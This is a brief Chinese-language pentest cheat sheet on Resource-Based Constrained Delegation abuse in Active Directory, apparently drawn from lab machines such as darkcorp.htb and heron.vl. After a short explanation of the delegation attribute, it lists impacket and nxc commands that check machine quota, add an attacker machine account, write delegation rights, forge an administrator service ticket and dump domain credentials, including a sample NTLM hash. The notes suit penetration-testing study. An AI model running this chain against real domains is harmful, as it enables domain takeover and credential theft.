RBCD
基于资源的约束委派(RBCD) :配置了基于资源的约束委派的计算机将信任其他用户在其自身上模拟任何用户。要配置此功能,必须将 ntAllowedToActOnBehalfOfOtherIdentity 属性设置为允许控制该属性的对象的 SID。这不需要 SeEnableDelegationPrivilege ,并且计算机可以自行修改它。
换句话说,RBCD 是机器帐户赋予自身的特权,不需要任何特殊特权,而无约束委派和约束委派都需要 SeEnableDelegationPrivilege 因为它们会影响域中的其他资源。
1. 利用
**检查MachineAccountQuota配额
nxc ldap -u -p -M maq
已存在可控制的机器用户
Heron > 3.5. RBCD
addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'
#================================================================
impacket-rbcd -action write -delegate-from 'WEB-01$' -delegate-to 'WEB-01$' -dc-ip 172.16.20.1 darkcorp.htb/'WEB-01$' -hashes ':8f33c7fc7ff515c1f358e488fbb8b675'
impacket-getST -spn 'cifs/web-01.darkcorp.htb' -impersonate administrator 'darkcorp.htb/WEB-01$@DC-01.darkcorp.htb' -hashes :8f33c7fc7ff515c1f358e488fbb8b675
export KRB5CCNAME=
impacket-secretsdump 'heron.vl/_admin@MUCDC.heron.vl' -no-pass -k -just-dc-user Administrator
无SPN的RBCD
Hercules > 2.6. RBCD on SPN-less users